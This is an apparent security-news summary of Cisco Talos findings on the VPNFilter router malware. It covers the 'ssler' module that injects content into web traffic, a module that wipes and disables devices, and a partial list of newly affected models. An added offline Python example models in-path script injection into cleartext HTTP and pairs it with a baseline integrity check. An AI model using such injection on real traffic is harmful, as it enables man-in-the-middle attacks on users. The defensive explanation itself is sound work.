Cisco Talos Intelligence VPNFilter Findings & IOC Update
Cisco Talos and several intelligence partners have published new findings on the VPNFilter malware. It has been determined that additional devices are being targeted, including some from vendors not previously seen on the target list.
Another discovery is a new stage 3 module, named "ssler", that injects malicious content into web traffic as it passes through an infected device. Because the device sits in the path between the client and the server, this man-in-the-middle (MitM) position also lets the attacker deliver exploits to endpoints behind the device. Talos has published additional details on this module.
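The following is an added illustration of the in-path injection technique described above and of a simple client-side check for it; it is not Talos' analysis and not the malware's own code. The HTTP response, the injected script tag and the URL example.invalid are all constructed for the example, and the check assumes the defender can obtain the same page through a trusted path (for instance over HTTPS from a different network) to use as a baseline.

```python
"""
Added example: model of in-path HTTP content injection by a compromised
gateway, plus an integrity check that compares a response seen through the
suspect path with the same resource fetched through a trusted path.
All traffic below is constructed inline; nothing touches the network.
"""
import hashlib
import re

# Constructed sample: a cleartext HTTP/1.1 response as it leaves the origin.
ORIGINAL_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 65\r\n"
    b"\r\n"
    b"<html><head><title>Bank</title></head><body>Welcome</body></html>"
)

# Hypothetical payload an in-path injector would add (a harmless marker here).
INJECTED_TAG = b'<script src="http://example.invalid/inject.js"></script>'


def split_response(raw: bytes):
    """Split a raw HTTP response into (header_block, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    return head, body


def inject_into_response(raw: bytes, payload: bytes = INJECTED_TAG) -> bytes:
    """Model of what a MitM device does to cleartext HTML passing through it:
    insert a payload before </head> and fix up Content-Length so the client
    still sees a well-formed response. This models the technique, not the
    malware's implementation."""
    head, body = split_response(raw)
    if b"text/html" not in head.lower() or b"</head>" not in body:
        return raw  # only HTML is rewritten; everything else passes untouched
    new_body = body.replace(b"</head>", payload + b"</head>", 1)
    new_head = re.sub(
        rb"(?im)^content-length:\s*\d+",
        b"Content-Length: %d" % len(new_body),
        head,
    )
    return new_head + b"\r\n\r\n" + new_body


def body_digest(raw: bytes) -> str:
    """SHA-256 of the body only; headers such as Date legitimately vary."""
    return hashlib.sha256(split_response(raw)[1]).hexdigest()


def check_integrity(observed: bytes, baseline: bytes) -> dict:
    """Compare a response seen through the suspect path against the same
    resource obtained through a trusted path. Returns findings as a dict so
    they can be acted on or asserted on rather than only printed."""
    obs_head, obs_body = split_response(observed)
    base_body = split_response(baseline)[1]
    declared = re.search(rb"(?im)^content-length:\s*(\d+)", obs_head)
    declared_len = int(declared.group(1)) if declared else None
    findings = {
        "body_matches_baseline": body_digest(observed) == body_digest(baseline),
        # A careful injector fixes Content-Length, so a consistent length
        # proves nothing on its own; an inconsistent one is a cheap red flag.
        "length_consistent": declared_len == len(obs_body),
        # Script sources present in the observed body but absent from baseline.
        "injected_scripts": [
            m.decode()
            for m in re.findall(rb'<script[^>]*src="([^"]+)"', obs_body)
            if m not in base_body
        ],
    }
    findings["tampered"] = (
        not findings["body_matches_baseline"] or bool(findings["injected_scripts"])
    )
    return findings


if __name__ == "__main__":
    tampered = inject_into_response(ORIGINAL_RESPONSE)
    print(check_integrity(ORIGINAL_RESPONSE, ORIGINAL_RESPONSE))
    print(check_integrity(tampered, ORIGINAL_RESPONSE))
```

The point of the baseline comparison is that an injector which rewrites Content-Length leaves the response syntactically valid, so a client cannot detect the tampering from the response alone; only a second copy of the resource obtained outside the suspect path, or transport security that the gateway cannot strip, exposes the change.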
Further analysis of the malware shows yet another stage 3 module that, when executed, removes traces of the VPNFilter malware from the device and then disables it, rendering the affected device unusable. Talos has also published further analysis of this module.
Affected devices listed in the update include the following (entries marked "new" were not on the earlier list):
RB Groove (new)
RB Omnitik (new)
Other QNAP NAS devices running QTS software
PBE M5 (new)
Unknown Models* (new)
ZXHN H108N (new)
Security teams and the research community are still investigating the malware. The list of affected devices may be updated further: additional variants of this malware are suspected to exist, and new devices may be targeted.
If you have a device from one of the vendors above, now is a good time to check for model-specific firmware updates. Check the manufacturer's website for updates and instructions.
For more information and the latest news regarding the VPNFilter malware visit Talos Intelligence.